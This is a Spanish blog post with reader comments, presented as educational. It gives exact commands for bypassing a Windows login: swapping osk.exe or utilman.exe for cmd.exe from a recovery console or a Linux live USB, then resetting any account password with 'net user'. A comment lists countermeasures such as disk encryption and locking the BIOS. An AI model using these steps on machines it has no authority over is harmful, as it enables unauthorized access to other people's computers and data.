Como hackear la contraseña del administrador en Windows (Solo con fines educativos)
Imaginad como profesores que un alumno ha cambiado la contraseña de un equipo y toca mantenimiento.
O imaginad alumnos del ciclo SMR que os pide ayuda el vecino, pues este vídeo es solo para eso, como el post de sospedia.net
Tras el disclaimer que estáis aceptando todos al ver este vídeo la receta, para los que le dan al “no me gusta” simplemente por el hecho de que no he cortado el vídeo y podría haber sido de 5 minutos:
Nos agenciamos el CD, ISO o USB para entrar en la consola de reparación de Windows, salimos al símbolo del sistema o interprete de comandos:
c: cd Windows\System32 rename osk.exe osk.old copy cmd.exe osk.exe
Ahora reiniciamos normalmente y activamos teclado en pantalla, con lo que tendremos acceso a la consola como “administradores” y con el comando:
net user
Averiguamos los usuarios del sistema, en mi caso necesito cambiar la password del usuario “tecnico“. Pues con este otro comando la establecemos:
net user tecnico * → Enter password: youarepawned
Fácil, fácil …. xD !!!
***Remember to undo:
Saliendo en otro reinicio a la consola de recuperación, y a la linea de comandos:
c: cd Windows\System32 del osk.exe rename osk.old osk.exe
El vídeo este:
Espero que sea de gran utilidad xD
No lo he probado, pero me niego a creer que Windows ejecute el osk como usuario administrador al pulsar sobre el botón en la pantalla de login.
También me niego a creer que desde el símbolo del sistema que ejecutas desde el DVD de instalación, puedas renombrar ficheros en System32.
Si estas dos cosas son posibles, Microsoft debe de solucionar esto pero ya.
Hahaha
Pues no te niegues tanto Ivan, probado en un aula del Instituto en Windows 10 1709
Saludos
No permitimos comentarios soeces Diego, así que lo elimino.
Saludos
No solo funciona con osk.exe, sino con utilman.exe (utilidad de accesibilidad). Ni siquiera hace falta el CD de instalación de Windows para entrar en la consola de reparación. Arrancando con un linux Live, montas el disco ntfs y renombras los archivos desde la shell de Linux (aunque si tiene secureboot con TPM, no arrancará Linux, entonces sí que hace falta el CD de Windows)
Solución respondiendo a Iván: la primera capa de la seguridad informática es proteger el control de acceso físico a tu equipo. Si alguien tiene acceso físico a tu ordenador, de nada sirve tener contraseñas fuertes o permisos en el sistema de archivos, por eso es posible. La solución es cifrra el disco mediante BitLocker o VeraCrypt, desactivar los USB y proteger la BIOS/UEFI para evitar que arranquen desde CD (aunque las BIOS también tienen sus vulnerabilidades)
Muchas gracias Ramón.
Pingback: Bonus Pack 2018: Recopilación de artículos de sospedia.net – Jose Blanco Vega
Pingback: Bonus Pack 2018: Recopilación de artículos de sospedia.net – Clases fp
buenas noches comp puedo hacer por que mi laptop se bloqueó el usuario y no puedo entrar no me acuerdo la contraseña y no puse info a la hora de crearla esta en Windows 10 necesito ayuda x favor no puedo formatear hay info y programas valiosos
tengo un archivo en acces (vacio) y quiero saber la estrucutura de los ficheros.
pero tiene password que puedo hacer ?
Prueba con https://www.isunshare.com/access-password-genius/
O https://lmgtfy.es/?q=access+decrypt
En un capítulo de Mr. Robot de la cuarta temporada utilizan esta técnica. Muy sencilla y que Windows lleva desde hace tiempo arrastrando. En el primero que lo hice fue en un XP
en una oportunidad logre presionar teclado en pantalla y me salio cmd, pero lo reinicie porque tambien se puso a narrar todo, al prenderlo nuevamente ya no me funciona…. debo haber cambiado/confundido los nombres de los archivos osk y cmd
nome deja renombrar el archivo osk, me dice; “El sistema no tiene acceso al archivo”
para activar el Administrador incluso desde una cuenta normal por cmd
c:\>windows\System32>net user Administrador /active:yes
para ocultar
c:\>windows\System32>net user Administrador /active:no
Hola y gracias por tu aportación.
Pero inmediatamente después establece una contraseña, que este usuario está deshabilitado por defecto.
No obstante el propósito del articulo es, sin tener acceso a un equipo o mejor dicho a ningún inicio de sesión, solamente a la pantalla de inicio, como quitar la contraseña a cualquier usuario.
Imagínate que tras meses de no utilizar un equipo, y para cualquier cuenta, no recuerdas la contraseña.
Salud y fuerza
Me podrian ayudar, pongo D:\windows\system32>dir osk.exe y me sale “no se encuentra el archivo”. ¿Qué puedo hacer?
Qué versión de Windows tienes, si sales a consola puedes averiguarlo con el comando winver, otra cosa es que no puedas salir a consola.
Por lo que pones ¿Tienes instalado Windows en la unidad D:?
También por lo que pones, ¿Estas ejecutando todo esto como comando? D:\windows\system32>dir osk.exe (si este es el caso no funciona así)
O te estas refiriendo que ¿¿una vez estás en la unidad D: y has cambiado a la carpeta D:\windows\system32 realizas el comando dir osk.exe??
Intenta aportar más información y veremos como ayudarte
Espero que sea con fines educativos xD
Saludos
Igual no es D: la unidad, igual es C:
O a lo mejor habrá cambiado con la versión 1909 de Windows 10, haría que localizar otro ejecutable accesible por teclas en la pantalla de inicio, y realizarlo con una live de Linux en lugar de con el DVD/USB de instalación de Windows o la consola de recuperación.
En la mía todavía está:
jose@eniak /cygdrive/c/Windows
$ cd /cygdrive/c/Windows/
jose@eniak /cygdrive/c/Windows
$ find -name “osk.exe” 2> /dev/null
./servicing/LCU/Package_for_RollupFix~31bf3856ad364e35~amd64~~18362.778.1.9/amd64_microsoft-windows-osk_31bf3856ad364e35_10.0.18362.449_none_0098d787eb84df09/f/osk.exe
./servicing/LCU/Package_for_RollupFix~31bf3856ad364e35~amd64~~18362.778.1.9/amd64_microsoft-windows-osk_31bf3856ad364e35_10.0.18362.449_none_0098d787eb84df09/r/osk.exe
./servicing/LCU/Package_for_RollupFix~31bf3856ad364e35~amd64~~18362.815.1.12/amd64_microsoft-windows-osk_31bf3856ad364e35_10.0.18362.449_none_0098d787eb84df09/f/osk.exe
./servicing/LCU/Package_for_RollupFix~31bf3856ad364e35~amd64~~18362.815.1.12/amd64_microsoft-windows-osk_31bf3856ad364e35_10.0.18362.449_none_0098d787eb84df09/r/osk.exe
./servicing/LCU/Package_for_RollupFix~31bf3856ad364e35~amd64~~18362.836.1.6/amd64_microsoft-windows-osk_31bf3856ad364e35_10.0.18362.449_none_0098d787eb84df09/f/osk.exe
./servicing/LCU/Package_for_RollupFix~31bf3856ad364e35~amd64~~18362.836.1.6/amd64_microsoft-windows-osk_31bf3856ad364e35_10.0.18362.449_none_0098d787eb84df09/r/osk.exe
./System32/osk.exe
./WinSxS/amd64_microsoft-windows-osk_31bf3856ad364e35_10.0.18362.449_none_0098d787eb84df09/f/osk.exe
./WinSxS/amd64_microsoft-windows-osk_31bf3856ad364e35_10.0.18362.449_none_0098d787eb84df09/osk.exe
./WinSxS/amd64_microsoft-windows-osk_31bf3856ad364e35_10.0.18362.449_none_0098d787eb84df09/r/osk.exe
Saludos
Hola, quisiera saber si hay una manera de recuperar la clave de un usuario invitado, desde otro usuario invitado, debido a que está asociado a un viejo correo Hotmail y necesito tener acceso a el.
Gracias 🙂
Increíble aportación José Blanco, sigue así. Ninguna de tus soluciones es efectiva háztelo mirar. Después de acceder a símbolo de sistema pide la contraseña del admin, estoy decepcionado. Por cierto, bonita foto de perfil, me recuerda a cuando estuve en Bucarest con mi tortuga. Saludos cálidos.